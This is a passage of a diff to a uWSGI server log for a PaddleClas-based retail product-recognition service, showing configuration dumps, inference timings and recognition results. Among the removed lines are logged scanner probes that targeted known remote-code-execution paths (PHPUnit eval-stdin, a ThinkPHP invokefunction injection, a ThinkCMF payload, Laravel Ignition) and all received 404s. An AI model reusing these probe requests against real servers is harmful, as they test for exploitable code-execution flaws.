ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2408.019781112671 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6413829}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6413829} +2022-02-14 08:54:35 INFO: DetPostProcess : +2022-02-14 08:54:35 INFO: DetPreProcess : +2022-02-14 08:54:35 INFO: transform_ops : +2022-02-14 08:54:35 INFO: DetResize : +2022-02-14 08:54:35 INFO: interp : 2 +2022-02-14 08:54:35 INFO: keep_ratio : False +2022-02-14 08:54:35 INFO: target_size : [640, 640] +2022-02-14 08:54:35 INFO: DetNormalizeImage : +2022-02-14 08:54:35 INFO: is_scale : True +2022-02-14 08:54:35 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:54:35 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:54:35 INFO: DetPermute : +2022-02-14 08:54:35 INFO: Global : +2022-02-14 08:54:35 INFO: batch_size : 1 +2022-02-14 08:54:35 INFO: cpu_num_threads : 1 +2022-02-14 08:54:35 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:54:35 INFO: enable_benchmark : True +2022-02-14 08:54:35 INFO: enable_mkldnn : True +2022-02-14 08:54:35 INFO: enable_profile : False +2022-02-14 08:54:35 INFO: gpu_mem : 8000 +2022-02-14 08:54:35 INFO: image_shape : [3, 640, 640] +2022-02-14 08:54:35 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:54:35 INFO: ir_optim : True +2022-02-14 08:54:35 INFO: labe_list : ['foreground'] +2022-02-14 08:54:35 INFO: max_det_results : 5 +2022-02-14 08:54:35 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:54:35 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:54:35 INFO: threshold : 0.2 +2022-02-14 08:54:35 INFO: use_fp16 : False +2022-02-14 08:54:35 INFO: use_gpu : False +2022-02-14 08:54:35 INFO: use_tensorrt : False +2022-02-14 08:54:35 INFO: IndexProcess : +2022-02-14 08:54:35 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:54:35 INFO: return_k : 5 +2022-02-14 08:54:35 INFO: score_thres : 0.5 +2022-02-14 08:54:35 INFO: RecPostProcess : None +2022-02-14 08:54:35 INFO: RecPreProcess : +2022-02-14 08:54:35 INFO: transform_ops : +2022-02-14 08:54:35 INFO: ResizeImage : +2022-02-14 08:54:35 INFO: size : 224 +2022-02-14 08:54:35 INFO: NormalizeImage : +2022-02-14 08:54:35 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:54:35 INFO: order : +2022-02-14 08:54:35 INFO: scale : 0.00392157 +2022-02-14 08:54:35 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:54:35 INFO: ToCHWImage : None +Inference: 371.631383895874 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6413829}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 23/41] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 05:06:31 2021] POST /reference_client/ => generated 114 bytes in 6344 msecs (HTTP/1.1 200) 5 headers in 158 bytes (9 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1141/1343] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:54:34 2022] POST /reference_client/ => generated 98 bytes in 2943 msecs (HTTP/1.1 200) 5 headers in 157 bytes (19 switches on core 0) req -2021-11-03 05:06:49 INFO: +2022-02-14 08:55:04 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -3208,78 +5249,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 05:06:49 INFO: DetPostProcess : -2021-11-03 05:06:49 INFO: DetPreProcess : -2021-11-03 05:06:49 INFO: transform_ops : -2021-11-03 05:06:49 INFO: DetResize : -2021-11-03 05:06:49 INFO: interp : 2 -2021-11-03 05:06:49 INFO: keep_ratio : False -2021-11-03 05:06:49 INFO: target_size : [640, 640] -2021-11-03 05:06:49 INFO: DetNormalizeImage : -2021-11-03 05:06:49 INFO: is_scale : True -2021-11-03 05:06:49 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:06:49 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:06:49 INFO: DetPermute : -2021-11-03 05:06:49 INFO: Global : -2021-11-03 05:06:49 INFO: batch_size : 1 -2021-11-03 05:06:49 INFO: cpu_num_threads : 10 -2021-11-03 05:06:49 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 05:06:49 INFO: enable_benchmark : True -2021-11-03 05:06:49 INFO: enable_mkldnn : True -2021-11-03 05:06:49 INFO: enable_profile : False -2021-11-03 05:06:49 INFO: gpu_mem : 8000 -2021-11-03 05:06:49 INFO: image_shape : [3, 640, 640] -2021-11-03 05:06:49 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 05:06:49 INFO: ir_optim : True -2021-11-03 05:06:49 INFO: labe_list : ['foreground'] -2021-11-03 05:06:49 INFO: max_det_results : 5 -2021-11-03 05:06:49 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 05:06:49 INFO: rec_nms_thresold : 0.05 -2021-11-03 05:06:49 INFO: threshold : 0.2 -2021-11-03 05:06:49 INFO: use_fp16 : False -2021-11-03 05:06:49 INFO: use_gpu : False -2021-11-03 05:06:49 INFO: use_tensorrt : False -2021-11-03 05:06:49 INFO: IndexProcess : -2021-11-03 05:06:49 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 05:06:49 INFO: return_k : 5 -2021-11-03 05:06:49 INFO: score_thres : 0.5 -2021-11-03 05:06:49 INFO: RecPostProcess : None -2021-11-03 05:06:49 INFO: RecPreProcess : -2021-11-03 05:06:49 INFO: transform_ops : -2021-11-03 05:06:49 INFO: ResizeImage : -2021-11-03 05:06:49 INFO: size : 224 -2021-11-03 05:06:49 INFO: NormalizeImage : -2021-11-03 05:06:49 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:06:49 INFO: order : -2021-11-03 05:06:49 INFO: scale : 0.00392157 -2021-11-03 05:06:49 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:06:49 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2281.2464237213135 ms per batch image -[{'bbox': [58, 165, 407, 480], 'rec_docs': '江小白', 'rec_scores': 0.5766264}] -{'bbox': [58, 165, 407, 480], 'rec_docs': '江小白', 'rec_scores': 0.5766264} +2022-02-14 08:55:04 INFO: DetPostProcess : +2022-02-14 08:55:04 INFO: DetPreProcess : +2022-02-14 08:55:04 INFO: transform_ops : +2022-02-14 08:55:04 INFO: DetResize : +2022-02-14 08:55:04 INFO: interp : 2 +2022-02-14 08:55:04 INFO: keep_ratio : False +2022-02-14 08:55:04 INFO: target_size : [640, 640] +2022-02-14 08:55:04 INFO: DetNormalizeImage : +2022-02-14 08:55:04 INFO: is_scale : True +2022-02-14 08:55:04 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:55:04 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:55:04 INFO: DetPermute : +2022-02-14 08:55:04 INFO: Global : +2022-02-14 08:55:04 INFO: batch_size : 1 +2022-02-14 08:55:04 INFO: cpu_num_threads : 1 +2022-02-14 08:55:04 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:55:04 INFO: enable_benchmark : True +2022-02-14 08:55:04 INFO: enable_mkldnn : True +2022-02-14 08:55:04 INFO: enable_profile : False +2022-02-14 08:55:04 INFO: gpu_mem : 8000 +2022-02-14 08:55:04 INFO: image_shape : [3, 640, 640] +2022-02-14 08:55:04 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:55:04 INFO: ir_optim : True +2022-02-14 08:55:04 INFO: labe_list : ['foreground'] +2022-02-14 08:55:04 INFO: max_det_results : 5 +2022-02-14 08:55:04 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:55:04 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:55:04 INFO: threshold : 0.2 +2022-02-14 08:55:04 INFO: use_fp16 : False +2022-02-14 08:55:04 INFO: use_gpu : False +2022-02-14 08:55:04 INFO: use_tensorrt : False +2022-02-14 08:55:04 INFO: IndexProcess : +2022-02-14 08:55:04 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:55:04 INFO: return_k : 5 +2022-02-14 08:55:04 INFO: score_thres : 0.5 +2022-02-14 08:55:04 INFO: RecPostProcess : None +2022-02-14 08:55:04 INFO: RecPreProcess : +2022-02-14 08:55:04 INFO: transform_ops : +2022-02-14 08:55:04 INFO: ResizeImage : +2022-02-14 08:55:04 INFO: size : 224 +2022-02-14 08:55:04 INFO: NormalizeImage : +2022-02-14 08:55:04 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:55:04 INFO: order : +2022-02-14 08:55:04 INFO: scale : 0.00392157 +2022-02-14 08:55:04 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:55:04 INFO: ToCHWImage : None +Inference: 374.0994930267334 ms per batch image +[] 234 -["{'bbox': [58, 165, 407, 480], 'rec_docs': '江小白', 'rec_scores': 0.5766264}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 17/42] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 05:06:48 2021] POST /reference_client/ => generated 114 bytes in 6051 msecs (HTTP/1.1 200) 5 headers in 158 bytes (8 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1142/1344] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:55:03 2022] POST /reference_client/ => generated 98 bytes in 2951 msecs (HTTP/1.1 200) 5 headers in 157 bytes (17 switches on core 0) req -2021-11-03 05:07:07 INFO: +2022-02-14 08:59:33 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -3289,135 +5311,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 05:07:07 INFO: DetPostProcess : -2021-11-03 05:07:07 INFO: DetPreProcess : -2021-11-03 05:07:07 INFO: transform_ops : -2021-11-03 05:07:07 INFO: DetResize : -2021-11-03 05:07:07 INFO: interp : 2 -2021-11-03 05:07:07 INFO: keep_ratio : False -2021-11-03 05:07:07 INFO: target_size : [640, 640] -2021-11-03 05:07:07 INFO: DetNormalizeImage : -2021-11-03 05:07:07 INFO: is_scale : True -2021-11-03 05:07:07 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:07:07 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:07:07 INFO: DetPermute : -2021-11-03 05:07:07 INFO: Global : -2021-11-03 05:07:07 INFO: batch_size : 1 -2021-11-03 05:07:07 INFO: cpu_num_threads : 10 -2021-11-03 05:07:07 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 05:07:07 INFO: enable_benchmark : True -2021-11-03 05:07:07 INFO: enable_mkldnn : True -2021-11-03 05:07:07 INFO: enable_profile : False -2021-11-03 05:07:07 INFO: gpu_mem : 8000 -2021-11-03 05:07:07 INFO: image_shape : [3, 640, 640] -2021-11-03 05:07:07 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 05:07:07 INFO: ir_optim : True -2021-11-03 05:07:07 INFO: labe_list : ['foreground'] -2021-11-03 05:07:07 INFO: max_det_results : 5 -2021-11-03 05:07:07 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 05:07:07 INFO: rec_nms_thresold : 0.05 -2021-11-03 05:07:07 INFO: threshold : 0.2 -2021-11-03 05:07:07 INFO: use_fp16 : False -2021-11-03 05:07:07 INFO: use_gpu : False -2021-11-03 05:07:07 INFO: use_tensorrt : False -2021-11-03 05:07:07 INFO: IndexProcess : -2021-11-03 05:07:07 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 05:07:07 INFO: return_k : 5 -2021-11-03 05:07:07 INFO: score_thres : 0.5 -2021-11-03 05:07:07 INFO: RecPostProcess : None -2021-11-03 05:07:07 INFO: RecPreProcess : -2021-11-03 05:07:07 INFO: transform_ops : -2021-11-03 05:07:07 INFO: ResizeImage : -2021-11-03 05:07:07 INFO: size : 224 -2021-11-03 05:07:07 INFO: NormalizeImage : -2021-11-03 05:07:07 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:07:07 INFO: order : -2021-11-03 05:07:07 INFO: scale : 0.00392157 -2021-11-03 05:07:07 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:07:07 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2486.5872859954834 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5730278}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5730278} +2022-02-14 08:59:33 INFO: DetPostProcess : +2022-02-14 08:59:33 INFO: DetPreProcess : +2022-02-14 08:59:33 INFO: transform_ops : +2022-02-14 08:59:33 INFO: DetResize : +2022-02-14 08:59:33 INFO: interp : 2 +2022-02-14 08:59:33 INFO: keep_ratio : False +2022-02-14 08:59:33 INFO: target_size : [640, 640] +2022-02-14 08:59:33 INFO: DetNormalizeImage : +2022-02-14 08:59:33 INFO: is_scale : True +2022-02-14 08:59:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:59:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:59:33 INFO: DetPermute : +2022-02-14 08:59:33 INFO: Global : +2022-02-14 08:59:33 INFO: batch_size : 1 +2022-02-14 08:59:33 INFO: cpu_num_threads : 1 +2022-02-14 08:59:33 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:59:33 INFO: enable_benchmark : True +2022-02-14 08:59:33 INFO: enable_mkldnn : True +2022-02-14 08:59:33 INFO: enable_profile : False +2022-02-14 08:59:33 INFO: gpu_mem : 8000 +2022-02-14 08:59:33 INFO: image_shape : [3, 640, 640] +2022-02-14 08:59:33 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:59:33 INFO: ir_optim : True +2022-02-14 08:59:33 INFO: labe_list : ['foreground'] +2022-02-14 08:59:33 INFO: max_det_results : 5 +2022-02-14 08:59:33 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:59:33 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:59:33 INFO: threshold : 0.2 +2022-02-14 08:59:33 INFO: use_fp16 : False +2022-02-14 08:59:33 INFO: use_gpu : False +2022-02-14 08:59:33 INFO: use_tensorrt : False +2022-02-14 08:59:33 INFO: IndexProcess : +2022-02-14 08:59:33 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:59:33 INFO: return_k : 5 +2022-02-14 08:59:33 INFO: score_thres : 0.5 +2022-02-14 08:59:33 INFO: RecPostProcess : None +2022-02-14 08:59:33 INFO: RecPreProcess : +2022-02-14 08:59:33 INFO: transform_ops : +2022-02-14 08:59:33 INFO: ResizeImage : +2022-02-14 08:59:33 INFO: size : 224 +2022-02-14 08:59:33 INFO: NormalizeImage : +2022-02-14 08:59:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:59:33 INFO: order : +2022-02-14 08:59:33 INFO: scale : 0.00392157 +2022-02-14 08:59:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:59:33 INFO: ToCHWImage : None +Inference: 372.40147590637207 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5730278}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 24/43] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 05:07:05 2021] POST /reference_client/ => generated 114 bytes in 6422 msecs (HTTP/1.1 200) 5 headers in 158 bytes (10 switches on core 0) -[pid: 32765|app: 0|req: 25/44] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 05:18:12 2021] GET / => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 18/45] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 05:18:14 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32764|app: 0|req: 1/46] 209.141.51.171 () {48 vars in 877 bytes} [Wed Nov 3 05:18:32 2021] POST /boaform/admin/formLogin => generated 179 bytes in 382 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 26/47] 106.52.34.90 () {44 vars in 748 bytes} [Wed Nov 3 05:23:04 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 27/48] 209.141.56.209 () {40 vars in 568 bytes} [Wed Nov 3 05:23:47 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 28/49] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 05:35:34 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 19/50] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 05:35:35 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 29/51] 60.217.75.69 () {32 vars in 364 bytes} [Wed Nov 3 05:40:28 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 30/52] 45.146.164.110 () {38 vars in 712 bytes} [Wed Nov 3 05:42:33 2021] POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 20/53] 45.146.164.110 () {38 vars in 636 bytes} [Wed Nov 3 05:42:33 2021] POST /Autodiscover/Autodiscover.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32764|app: 0|req: 2/54] 45.146.164.110 () {36 vars in 624 bytes} [Wed Nov 3 05:42:34 2021] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32763|app: 0|req: 2/55] 45.146.164.110 () {34 vars in 556 bytes} [Wed Nov 3 05:42:34 2021] GET /solr/admin/info/system?wt=json => generated 179 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 31/56] 45.146.164.110 () {34 vars in 720 bytes} [Wed Nov 3 05:42:35 2021] GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 21/57] 45.146.164.110 () {36 vars in 653 bytes} [Wed Nov 3 05:42:35 2021] GET /?a=fetch&content=die(@md5(HelloThinkCMF)) => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 32/58] 45.146.164.110 () {34 vars in 587 bytes} [Wed Nov 3 05:42:36 2021] GET /wp-content/plugins/wp-file-manager/readme.txt => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32761|app: 0|req: 1/59] 45.146.164.110 () {34 vars in 556 bytes} [Wed Nov 3 05:42:35 2021] GET /?XDEBUG_SESSION_START=phpstorm => generated 179 bytes in 261 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 33/60] 45.146.164.110 () {36 vars in 602 bytes} [Wed Nov 3 05:42:36 2021] GET /_ignition/execute-solution => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32763|app: 0|req: 3/61] 45.146.164.110 () {36 vars in 550 bytes} [Wed Nov 3 05:42:36 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32760|app: 0|req: 1/62] 45.146.164.110 () {34 vars in 513 bytes} [Wed Nov 3 05:42:37 2021] GET /console/ => generated 179 bytes in 503 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32759|app: 0|req: 1/63] 45.146.164.110 () {38 vars in 610 bytes} [Wed Nov 3 05:42:37 2021] POST /api/jsonws/invoke => generated 179 bytes in 504 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 34/64] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 05:47:49 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 22/65] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 05:47:50 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 35/66] 71.6.232.4 () {34 vars in 484 bytes} [Wed Nov 3 05:52:59 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 36/67] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 06:05:25 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 23/68] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 06:05:27 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 37/69] 165.227.136.172 () {30 vars in 333 bytes} [Wed Nov 3 06:07:10 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 38/70] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 06:18:05 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 24/71] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 06:18:06 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 39/72] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 06:32:36 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 25/73] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 06:32:38 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 40/74] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 06:50:19 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 26/75] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 06:50:21 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 41/76] 103.203.210.237 () {32 vars in 465 bytes} [Wed Nov 3 06:59:25 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 42/77] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 07:05:39 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 27/78] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 07:05:41 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 43/79] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 07:17:23 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 28/80] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 07:17:24 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 44/81] 83.97.20.34 () {32 vars in 386 bytes} [Wed Nov 3 07:30:11 2021] GET /tomcat.css => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 45/82] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 07:33:22 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 29/83] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 07:33:22 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 46/84] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 07:44:44 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 30/85] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 07:44:46 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 47/86] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 07:57:59 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 31/87] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 07:58:00 2021] GET / => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 48/88] 106.12.223.200 () {36 vars in 488 